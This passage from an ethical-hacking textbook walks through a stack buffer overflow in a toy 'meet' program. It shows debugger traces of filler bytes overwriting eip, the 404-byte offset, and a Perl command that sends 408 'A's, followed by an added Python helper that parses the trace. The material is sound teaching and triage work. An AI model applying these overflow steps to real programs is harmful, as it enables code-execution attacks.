exe
meet!_output+0x63c:
00401d7c 0fbe08 movsx ecx,byte ptr [eax] ds:0023:41414141=??
0:000> kP
ChildEBP RetAddr
0012fd08 00401112 meet!_output(
struct _iobuf * stream = 0x00415b90,
char * format = 0x00415b48 " %s.",
char * argptr = 0x0012fd38 "??")+0x63c
0012fd28 00401051 meet!printf(
char * format = 0x00415b40 "Hello %s %s.",
int buffing = 1)+0x52
Gray Hat Hacking: The Ethical Hacker's Handbook
260
0012fecc 41414141 meet!greeting(
char * temp1 = 0x41414141 "",
char * temp2 = 0x41414141 "")+0x31
WARNING: Frame IP not in any known module. Following frames may be wrong.
41414141 00000000 0x41414141
0:000>
As you can see from the stack trace (and as you might suspect because you've done
this before), 500 As corrupted the parameters passed to the greeting function, so we
don't hit the strcpy overflow. You know from Chapter 7 and from our stack construction
section earlier that eip starts 404 bytes after the start of the name buffer and is 4 bytes
long. We want to overwrite the range of bytes 404–408 past the beginning of name.
Here's what that looks like:
C:\grayhat>Perl -e "exec 'c:\\debuggers\\ntsd','-g','-G','meet','Mr.',("A" x 408)"
... (debugger loads in new window) ...
CommandLine: meet Mr.
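As an added example (not code from the book), here is a small Python triage helper that parses the ntsd `kP` output shown above, flags the frames whose return address or pointer arguments were overwritten by the 0x41 filler, and applies the offset rule from the text (saved eip begins 404 bytes into name and is 4 bytes long) to decide whether a given argument length reaches the return address at all. The trace embedded below is a constructed copy of the page's output, and the function names are my own.

```python
import re

# Constructed sample of the ntsd "kP" output shown on the page (not a live capture).
SAMPLE_KP = """0:000> kP
ChildEBP RetAddr
0012fd08 00401112 meet!_output(
struct _iobuf * stream = 0x00415b90,
char * format = 0x00415b48 " %s.",
char * argptr = 0x0012fd38 "??")+0x63c
0012fd28 00401051 meet!printf(
char * format = 0x00415b40 "Hello %s %s.",
int buffing = 1)+0x52
0012fecc 41414141 meet!greeting(
char * temp1 = 0x41414141 "",
char * temp2 = 0x41414141 "")+0x31
WARNING: Frame IP not in any known module. Following frames may be wrong.
41414141 00000000 0x41414141
"""

# A frame line: ChildEBP, RetAddr, then the symbol (or a bare address when unknown).
FRAME_RE = re.compile(r"^([0-9a-f]{8}) ([0-9a-f]{8}) (\S+)")
# An argument line printed by kP: "<type> <name> = 0x<value>".
ARG_RE = re.compile(r"(\w+) = 0x([0-9a-f]{8})")


def parse_kp(text):
    """Turn kP output into a list of frames: {'ebp', 'ret', 'symbol', 'args'}."""
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line)
        if m:
            frames.append({
                "ebp": int(m.group(1), 16),
                "ret": int(m.group(2), 16),
                "symbol": m.group(3).rstrip("("),
                "args": {},
            })
            continue
        a = ARG_RE.search(line)
        if a and frames:
            # Only pointer-sized hex arguments are recorded; "int buffing = 1" is skipped.
            frames[-1]["args"][a.group(1)] = int(a.group(2), 16)
    return frames


def is_filled_with(value, fill_byte, width=4):
    """True when a 32-bit value consists entirely of the filler byte (e.g. 0x41414141)."""
    return value == int.from_bytes(bytes([fill_byte]) * width, "little")


def controlled_return_frames(frames, fill_byte=0x41):
    """Symbols of frames whose saved return address came from the filler."""
    return [f["symbol"] for f in frames if is_filled_with(f["ret"], fill_byte)]


def corrupted_args(frames, fill_byte=0x41):
    """(symbol, argument) pairs whose pointer value came from the filler."""
    return [(f["symbol"], name)
            for f in frames
            for name, value in f["args"].items()
            if is_filled_with(value, fill_byte)]


def has_unknown_ip_warning(text):
    """True when the debugger reports that a frame's IP is outside any loaded module."""
    return any(line.startswith("WARNING: Frame IP not in any known module")
               for line in text.splitlines())


def overwrites_eip(payload_len, eip_offset=404, eip_len=4):
    """True when payload_len bytes written at the start of name cover the saved eip slot.

    The offset and width are the page's figures: eip starts 404 bytes into name
    and is 4 bytes long, so bytes 404..407 must be written to replace it.
    """
    return payload_len >= eip_offset + eip_len


if __name__ == "__main__":
    frames = parse_kp(SAMPLE_KP)
    print("return address overwritten in:", controlled_return_frames(frames))
    print("arguments overwritten:", corrupted_args(frames))
    print("unknown-IP warning present:", has_unknown_ip_warning(SAMPLE_KP))
    for n in (403, 408, 500):
        print(f"{n} bytes reaches eip: {overwrites_eip(n)}")
```

Running it on the sample trace reports that `meet!greeting` returned into 0x41414141, that both of its pointer arguments were replaced by the filler, and that 403 bytes stop one byte short of the saved eip while 408 and 500 both cover it; the difference between 408 and 500 is only whether the bytes after eip (the greeting parameters) are clobbered as well, which is what the page's trace shows.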